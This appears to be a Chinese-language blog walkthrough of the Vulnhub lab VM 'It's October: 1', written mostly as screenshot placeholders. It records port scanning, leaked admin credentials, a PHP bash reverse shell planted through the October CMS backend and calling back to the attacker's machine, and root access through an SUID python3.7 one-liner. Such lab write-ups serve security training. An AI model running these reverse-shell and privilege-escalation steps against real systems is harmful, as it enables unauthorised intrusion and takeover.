title: 'Vulnhub-IT’S OCTOBER: 1'
tags: Vulnhub
abbrlink: 5f7601c6

date: 2022-12-14 09:35:56

描述

Welcome to “It’s October”

This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerabilities of target.

Goal: Get the root flag of the target.

Difficulty: Easy/Medium Level

Need hints? Twitter @akankshavermasv

DHCP is enabled

Your feedback is really valuable for me! Twitter @akankshavermasv

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good Luck..!!!

  • 需要修改网卡信息

image-20221214094332269

存活

image-20221214094454400

kali 192.168.169.220
 靶机 192.168.169.230

靶机扫描

image-20221214094558807

22 80 3306 8080

访问

image-20221214094844244

8080

image-20221214094938832

image-20221214095034035

image-20221214095704904

user        - admin
password    - adminadmin2

扫描目录

image-20221214095926489

image-20221214100142380

  • 一个登录界面

image-20221214100236912

  • 用上面的密码,登录成

image-20221214100553619

是个CMS应该有利用的漏洞或者类似wordpress的插件漏洞

漏洞利用

image-20221214101851937

  • 添加反弹shell的php代码

    function onstart(){
    exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.169.220/6666 0>&1'");
}

  • 设置监听

image-20221214102235513

  • 保存

image-20221214103853894

image-20221214103937453

  • 反弹成功

提权

  • 找一下suid权限
find / -perm -u=s -type f 2>/dev/null

image-20221214104149467

  • python提权
python3.7 -c 'import os;os.execl("/bin/bash","bash","-p")'

image-20221214104629707